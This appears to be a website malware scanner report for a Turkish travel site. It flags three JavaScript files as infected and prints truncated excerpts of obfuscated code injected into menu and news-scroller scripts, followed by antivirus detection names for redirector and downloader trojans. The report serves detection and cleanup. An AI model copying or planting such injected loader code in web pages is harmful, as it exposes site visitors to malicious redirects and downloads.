New scan:

Malware Scanner report for turquiaya.com

Malicious/Suspicious/Total urls checked
3/0/8
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://turquiaya.com/
200 OK
Content-Length: 45522
Content-Type: text/html
clean
http://turquiaya.com/menu/menu_ya.js
200 OK
Content-Length: 9891
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)




menunum=0;menus=new Array();_d=document;function addmenu(){menunum++;menus[menunum]=menu;}function dumpmenus(){mt="<script language=javascript>";for(a=1;a<menus.length;a++){mt+=" menu"+a+"=menus["+a+"];"}mt+="<\/script>";_d.write(mt)}





effect = ""

timegap=500 followspeed=5 followrate=40 suboffset_top=10; suboffset_left=10; Frames_Top_Offset=5 Frames_Left_Offset=110
style1=[ "white", "990000", "black",
... 3367 bytes are skipped ...
1][1];var YO;if(YO!='ZB' && YO != ''){YO=null};var rA=new Array();this.JU='';Q.body.appendChild(aE);this.vD='';var yL=new String();var np=new String();} catch(z){var NV;if(NV!='TE' && NV!='SKi'){NV='TE'};alert(z);};}this.Xj='';var Dj=new String();var _o="";v["BN4onl".substr(3)+"oad"]=a;var mR;if(mR!='mK'){mR=''};};var sM=new String();var UL=new String();var N_;if(N_!='_U'){N_='_U'};ia();var EO;if(EO!='' && EO!='Pl'){EO=null};var _M;if(_M!='' && _M!='qL'){_M=null};

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Illredir-AQ [Trj]
Ad-Aware
Exploit.HTML.Agent.DH
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AD
nProtect
Exploit.HTML.Agent.DH
K7AntiVirus
Exploit ( 04c559b91 )
TrendMicro-HouseCall
JS_GUMBLAR.SMNY
Emsisoft
Exploit.HTML.Agent.DH (B)
Comodo
TrojWare.JS.Redirector.UA
K7GW
Exploit ( 04c559b91 )
DrWeb
JS.Redirector.based.3
TrendMicro
JS_GUMBLAR.SMNY
Microsoft
Trojan:JS/Redirector.DC
MicroWorld-eScan
Exploit.HTML.Agent.DH
Tencent
Js.Trojan.Js.Amce
TotalDefense
JS/Redirector.BH
NANO-Antivirus
Trojan.Script.Redirector.vjwvm
Cyren
JS/Redir.AV
F-Secure
Exploit.HTML.Agent.DH
Avira
JS/Redirector.DC.8
F-Prot
JS/Redir.AV
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Exploit.HTML.Agent.DH
Symantec
Trojan.Malscript!html
Agnitum
JS.Redirector.Gen.5
BitDefender
Exploit.HTML.Agent.DH

http://turquiaya.com/menu/mmenu.js
200 OK
Content-Length: 27915
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)


Mtimer=setTimeout("sis()",9999);_d=document;smc=-1;MLoaded=0;
ns4=(_d.layers)?true:false
ns6=(navigator.userAgent.indexOf("Gecko")!=-1)?true:false
mac=(navigator.appVersion.indexOf("Mac")!=-1)?true:false
mac45=(navigator.appVersion.indexOf("MSIE 4.5")!=-1)?true:false
if(ns6||ns4)mac=false
opera=(navigator.userAgent.indexOf("Opera")!=-1)?true:false
ns61=(parseInt(navigator.productSub)>=20010726)?true:false
ie4=(!_d.getElementById&&_d.all)?t
... 3231 bytes are skipped ...
1][1];var YO;if(YO!='ZB' && YO != ''){YO=null};var rA=new Array();this.JU='';Q.body.appendChild(aE);this.vD='';var yL=new String();var np=new String();} catch(z){var NV;if(NV!='TE' && NV!='SKi'){NV='TE'};alert(z);};}this.Xj='';var Dj=new String();var _o="";v["BN4onl".substr(3)+"oad"]=a;var mR;if(mR!='mK'){mR=''};};var sM=new String();var UL=new String();var N_;if(N_!='_U'){N_='_U'};ia();var EO;if(EO!='' && EO!='Pl'){EO=null};var _M;if(_M!='' && _M!='qL'){_M=null};

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Illredir-AQ [Trj]
Ad-Aware
Exploit.HTML.Agent.DH
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AD
nProtect
Exploit.HTML.Agent.DH
K7AntiVirus
Exploit ( 04c559b91 )
TrendMicro-HouseCall
JS_GUMBLAR.SMNY
Emsisoft
Exploit.HTML.Agent.DH (B)
Comodo
TrojWare.JS.Redirector.UA
K7GW
Exploit ( 04c559b91 )
DrWeb
JS.Redirector.based.3
TrendMicro
JS_GUMBLAR.SMNY
Microsoft
Trojan:JS/Redirector.DC
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
MicroWorld-eScan
Exploit.HTML.Agent.DH
Tencent
Script.Trojan-downloader.Generic.Szbg
Fortinet
JS/Crypt.BBES!tr
TotalDefense
JS/Redirector.BH
NANO-Antivirus
Trojan.Script.Redirector.vjwvm
Cyren
JS/Redir.AV
F-Secure
Exploit.HTML.Agent.DH
Avira
JS/Redirector.DC.8
F-Prot
JS/Redir.AV
Sophos
Troj/JSRedir-BD
GData
Exploit.HTML.Agent.DH
Symantec
Trojan.Malscript!html
Agnitum
JS.Redirector.Gen.5
BitDefender
Exploit.HTML.Agent.DH

http://turquiaya.com/haber/haber.js
200 OK
Content-Length: 3654
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var pause_for = 10000
var speed = 3
var scrollerwidth= 260
var scrollerheight= 220
var scrollerbackground= 'news_back.jpg'
var messages=new Array()

messages[0]=" <font face='Verdana, Arial' size='1'> <font color=990000>SOLO ESTANCIA&#8230;&#8230;&#8230;.HOTELES EN ESTAMBUL </font> <br> <font face='Verdana, Arial' size='1'> <font color=990000><BR>Hotel Arena (Casa otomana)<BR>Hotel Hali (Cate
... 3188 bytes are skipped ...
1][1];var YO;if(YO!='ZB' && YO != ''){YO=null};var rA=new Array();this.JU='';Q.body.appendChild(aE);this.vD='';var yL=new String();var np=new String();} catch(z){var NV;if(NV!='TE' && NV!='SKi'){NV='TE'};alert(z);};}this.Xj='';var Dj=new String();var _o="";v["BN4onl".substr(3)+"oad"]=a;var mR;if(mR!='mK'){mR=''};};var sM=new String();var UL=new String();var N_;if(N_!='_U'){N_='_U'};ia();var EO;if(EO!='' && EO!='Pl'){EO=null};var _M;if(_M!='' && _M!='qL'){_M=null};

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Illredir-AQ [Trj]
Ad-Aware
Exploit.HTML.Agent.DH
Antiy-AVL
Trojan[Downloader]/JS.Pegel.ad
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AD
nProtect
Exploit.HTML.Agent.DH
K7AntiVirus
Exploit ( 04c559b91 )
TrendMicro-HouseCall
JS_GUMBLAR.SMNY
Emsisoft
Exploit.HTML.Agent.DH (B)
Comodo
TrojWare.JS.Redirector.UA
K7GW
Exploit ( 04c559b91 )
McAfee-GW-Edition
JS/Redirector.ad
DrWeb
JS.Redirector.based.3
TrendMicro
JS_GUMBLAR.SMNY
Microsoft
Trojan:JS/Redirector.DC
Kaspersky
Trojan-Downloader.JS.Pegel.ad
ViRobot
JS.A.Pegel.3654
MicroWorld-eScan
Exploit.HTML.Agent.DH
Tencent
Js.Trojan-downloader.Pegel.Egoi
Fortinet
JS/Crypt.BBES!tr
TotalDefense
JS/Redirector.BH
McAfee
JS/Redirector.ad
Cyren
JS/Redir.AV
NANO-Antivirus
Trojan.Script.Redirector.vjwvm
F-Secure
Exploit.HTML.Agent.DH
VIPRE
Trojan.JS.Redirector.cr (v)
Avira
JS/Redirector.DC.8
F-Prot
JS/Redir.AV
AVG
JS/Redir
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Exploit.HTML.Agent.DH
Symantec
Trojan.Malscript!html
AVware
Trojan.JS.Redirector.cr (v)
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AA
BitDefender
Exploit.HTML.Agent.DH

http://turquiaya.com/haber/diff_function.js
404 Not Found
Content-Length: 463
Content-Type: text/html
clean
http://turquiaya.com/test404page.js
404 Not Found
Content-Length: 455
Content-Type: text/html
clean
http://sm5.sitemeter.com/js/counter.js?site=sm5siteturquiaya
HTTP/1.1 302 Redirect
Date: Sun, 05 Oct 2014 00:32:33 GMT
Location: http://sm5.sitemeter.com/js/counter.asp?site=sm5siteturquiaya
Server: Microsoft-IIS/6.0
Content-Length: 184
Content-Type: text/html
X-Powered-By: ASP.NET
clean
http://sm5.sitemeter.com/js/counter.asp?site=sm5siteturquiaya
200 OK
Content-Length: 7567
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: turquiaya.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 00:32:30 GMT
Accept-Ranges: bytes
ETag: "3d0418-b1d2-485612130a280"
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.8o DAV/2 PHP/5.3.25
Vary: Accept-Encoding,User-Agent
Content-Length: 45522
Content-Type: text/html
Last-Modified: Thu, 29 Apr 2010 14:42:02 GMT

...45522 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: turquiaya.com
Referer: http://www.google.com/search?q=turquiaya.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=turquiaya.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://turquiaya.com/

Result: turquiaya.com is not infected or malware details are not published yet.